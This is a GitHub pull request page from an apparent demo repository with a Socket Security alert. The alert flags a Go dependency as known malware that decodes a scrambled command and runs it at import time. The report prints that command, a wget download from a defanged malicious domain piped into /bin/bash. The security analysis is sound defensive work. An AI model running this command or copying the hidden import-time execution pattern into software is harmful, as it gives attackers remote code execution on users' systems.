Skip to content

add malware for demo

52219e3
Select commit
Loading
Failed to load commit list.
Open

update readme #1

add malware for demo
52219e3
Select commit
Loading
Failed to load commit list.
Socket Security / Socket Security: Pull Request Alerts failed Jun 27, 2025 in 10s

Pull Request #1 Alerts: Complete with warnings

Report Status Message
PR #1 Alerts ⚠️ Found 1 project alert

Pull request alerts notify when new issues are detected between the diff of the pull request and it's target branch.

Details

Caution

Review the following alerts detected in dependencies.

According to your organization's Security Policy, you must resolve all "Block" alerts before proceeding. Learn more about Socket for GitHub.

Action Severity Alert (click for details)
Block Critical
github.com/insistentran/ipaddr@v0.0.0-20250227113218-37078b509e73 is Known malware.

Note: The file defines a function xUIpYv that assembles a shell command by indexing into a scrambled string array, then calls exec.Command("/bin/sh", "-c", cmd).Start() at import time. The decoded command is:

wget -O - https://liquitydevve[.]online/storage/de373d0df/a31546bf | /bin/bash &

This hidden payload downloads and executes a remote script in the background without user consent, allowing arbitrary code execution on any system that imports this package.

From: tests/go.modgolang/github.com/insistentran/ipaddr@v0.0.0-20250227113218-37078b509e73

ℹ Read more on: This package | This alert | What is known malware?

Next steps: Take a moment to review the security alert above. Review the linked package source code to understand the potential risk. Ensure the package is not malicious before proceeding. If you're unsure how to proceed, reach out to your security team or ask the Socket team for help at support@socket.dev.

Suggestion: It is strongly recommended that malware is removed from your codebase.

Mark the package as acceptable risk. To ignore this alert only in this pull request, reply with the comment @SocketSecurity ignore golang/github.com/insistentran/ipaddr@v0.0.0-20250227113218-37078b509e73. You can also ignore all packages with @SocketSecurity ignore-all. To ignore an alert for all future pull requests, use Socket's Dashboard to change the triage state of this alert.

View full report